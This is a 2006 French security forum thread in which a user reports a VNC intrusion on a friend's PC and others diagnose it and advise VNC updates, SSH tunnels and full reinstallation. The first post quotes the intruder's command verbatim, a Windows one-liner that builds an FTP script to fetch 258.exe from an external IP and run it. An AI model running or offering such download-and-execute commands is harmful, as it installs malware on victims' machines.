Attaque par VNC

Forum sur la sécurité des réseaux, la configuration des firewalls, la mise en place de protections contre les attaques, de DMZ, de systèmes anti-intrusion ...

Modérateur: modos Ixus

Attaque par VNC

Messagepar engi » 02 Déc 2006 15:03

bonjour,

j'ai assisté hier sur la machine d'un copain à une "attaque" via VNC.
pour faire de la télémaintenance sur sa machine, je lui ai installé il y un moment un serveur vnc.
depuis quelques temps, il me disait que son antivirus détecte souvent un cheval de troie et que le phénomène se reproduit régulièrement.
d'autre part, il me disait aussi qu'une fenêtre DOS apparaissait furtivement et que clavier et souris étaient bloqués.
hier, j'étais chez lui et j'ai assisté au problème.
j'ai tout de suite vu qu'une session distante VNC était ouverte et j'ai donc débranché le cable réseau.
parmis tout ce que faisait "l'opérateur" distant, voilà une commande qu'il lancait :

Code: Tout sélectionner
cmd.exe /c del i&echo open 86.201.215.239 2042 > i&echo user 1 1 >> i &echo get 258.exe >> i &echo quit >> i &ftp -n -s:i &258.exe&del i&exit

J'ai l'impression qu'il téléchargeait quelque chose mais je comprends pas tout.

Juste par curiosité, ça fait quoi cette commande ?
engi
Premier-Maître
Premier-Maître

Re: Attaque par VNC

Messagepar Gaston » 02 Déc 2006 15:52

engi a écrit:
Code: Tout sélectionner
cmd.exe /c del i&echo open 86.201.215.239 2042 > i&echo user 1 1 >> i &echo get 258.exe >> i &echo quit >> i &ftp -n -s:i &258.exe&del i&exit

Google t'aurais répondu aussi bien que moi : il ouvre une connexion quelque part sur le port 2042, ouvre un ftp et récupère un fichier 258.exe et l'exécute :(

un nettoyage de fonds en comblre, l'installation d'outils appropriés me semble urgent ?)

G.
Gaston
Amiral
Amiral

Messagepar engi » 02 Déc 2006 17:00

outils appropriés ?
qu'est-ce que tu entends par là ?

pour ce qui est de l'antivirus, c'est fait.

pour ce qui d'un parefeu, vu que le port utilisé pour les sessions distantes vnc est ouvert et que c'est justement vnc qui est utilisé pour pénétrer sur le système , je ne vois pas bien comment faire.

je précise que le pc n'a pas d'adresse ip publique fixe et que les sessions distantes sont censément protégées par la saisie d'un mot de passe.
à ce titre, comment notre "pirate" distant arrive-t-il à se loguer ?
engi
Premier-Maître
Premier-Maître

Messagepar S0l0 » 02 Déc 2006 18:02

hello ,

il me semble avoir vu un post semblable sur devellopez :roll:

pour ce qui d'un parefeu, vu que le port utilisé pour les sessions distantes vnc est ouvert et que c'est justement vnc qui est utilisé pour pénétrer sur le système , je ne vois pas bien comment faire.
au hazard essaie de mettre a jour VNC :P
je précise que le pc n'a pas d'adresse ip publique fixe
i believe i can fly .....
et que les sessions distantes sont censément protégées par la saisie d'un mot de passe.
à ce titre, comment notre "pirate" distant arrive-t-il à se loguer ?
VNC Authentication Bypass
et comment fait ' TON PIRATE ' pour se connecter ben il se connecte pas , c'est 258.exe qui se connecte ; c'est ce que l'on appel du remote connection.

En tout cas la reinstallation complete du systeme s'impose.

PS cette attaque est realisable par n'importe qui sachant cliquer :D
S0l0
Contre-Amiral
Contre-Amiral

Messagepar fred-info » 07 Déc 2006 13:03

Bonjour,

pour commencer un petit lien qui explique tout ça :

http://www.securiteam.com/unixfocus/5WP0D1FIKC.html

et à la fin

Workaround:
Run VNC servers behind firewall, and use SSH tunnels for communication.

Je rajouterai un conseil perso : Ne jamais utiliser les ports par défaut pour ce type d'appli

C'est beaucoup plus facile pour l'attaquant de voir un port ouvert et d'essayer son "exploit" si il sait lequel utiliser.

A+
fred-info
Lieutenant de vaisseau
Lieutenant de vaisseau

Retour vers Sécurité et réseaux